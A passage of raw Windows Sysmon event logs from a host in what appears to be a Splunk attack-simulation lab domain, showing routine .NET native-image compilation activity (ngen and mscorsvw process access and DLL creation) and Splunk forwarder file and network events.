21:04:32.725{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A1E0-60D3-E903-00000000CF01}6332C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020920Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:04:32.725{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1E0-60D3-E903-00000000CF01}6332C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000020919Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:04:32.662{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1E0-60D3-E803-00000000CF01}6772C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020918Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:32.647{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A1E0-60D3-E803-00000000CF01}6772C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020917Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:04:32.647{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1E0-60D3-E803-00000000CF01}6772C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000020916Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:04:32.631{4DB9351A-A1E0-60D3-E703-00000000CF01}5892C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1704-0\Microsoft.Windows.Diagnosis.TroubleshootingPack.dll2021-06-23 21:04:32.631 10341000x800000000000000020915Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:04:32.537{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1E0-60D3-E703-00000000CF01}5892C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020914Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:32.522{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A1E0-60D3-E703-00000000CF01}5892C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020913Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:04:32.522{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1E0-60D3-E703-00000000CF01}5892C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000020912Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:04:32.443{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1E0-60D3-E603-00000000CF01}6720C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020911Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:32.428{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A1E0-60D3-E603-00000000CF01}6720C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020910Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:04:32.428{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1E0-60D3-E603-00000000CF01}6720C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000020909Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:04:32.412{4DB9351A-A1E0-60D3-E503-00000000CF01}1088C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\440-0\Microsoft.Windows.Diagnosis.SDHost.dll2021-06-23 21:04:32.412 10341000x800000000000000020908Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:04:32.334{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1E0-60D3-E503-00000000CF01}1088C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020907Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:32.318{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A1E0-60D3-E503-00000000CF01}1088C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020906Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:04:32.318{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1E0-60D3-E503-00000000CF01}1088C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 23542300x800000000000000020905Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:32.256{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9AD1474A8ABC050AF8383BD64257AACA,SHA256=DD2326C8A04CEF884CEEE4B87AA0AADC45BDF3E58F8D2A9998633CF444C49E6F,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x800000000000000020962Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:39.100{4DB9351A-9DEA-60D3-3000-00000000CF01}2404NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=CC494228D9B622F65865431EE32BBCD9,SHA256=4850E6D9F469EFAD53275876C967519322E99DE1F613F517E377B814E20689E0,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000020965Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:39.140{4DB9351A-9DEA-60D3-3000-00000000CF01}2404C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-663.attackrange.local61428-false10.0.1.12-8089- 23542300x800000000000000020964Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:40.397{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=50ECA3E65D0F954803C69267DAEE54FC,SHA256=0DA8AAD5545FFB219AE62639462009F8A834EF734EAA545914CAB27FB6318B41,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000020971Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:40.217{4DB9351A-9DF7-60D3-6D00-00000000CF01}3888C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-663.attackrange.local61429-false10.0.1.12-8000- 10341000x800000000000000020970Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:04:41.818{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1E9-60D3-F203-00000000CF01}6740C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020969Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:41.740{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A1E9-60D3-F203-00000000CF01}6740C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020968Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:04:41.740{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1E9-60D3-F203-00000000CF01}6740C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000020967Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:04:41.553{4DB9351A-A1E6-60D3-F103-00000000CF01}2636C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\a4c-0\Microsoft.Windows.FileServer.Management.Plugin.UI.dll2021-06-23 21:04:41.537 23542300x800000000000000020966Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:04:41.443{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=94BF1C364FE4B0568BF3AA368C1BCE41,SHA256=DD3DA79F35875BE3DCE4E5DC7F001DBE808FCDFF6B7CE9AC500FBE8E25DE7311,IMPHASH=00000000000000000000000000000000falsetrue 11241100x800000000000000020991Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:04:42.975{4DB9351A-A1EA-60D3-F703-00000000CF01}6864C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1ad0-0\Microsoft.Windows.ServerManager.Activities.dll2021-06-23 21:04:42.975 10341000x800000000000000020990Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:42.865{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1EA-60D3-F703-00000000CF01}6864C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020989Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:04:42.850{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A1EA-60D3-F703-00000000CF01}6864C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020988Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:42.850{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1EA-60D3-F703-00000000CF01}6864C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d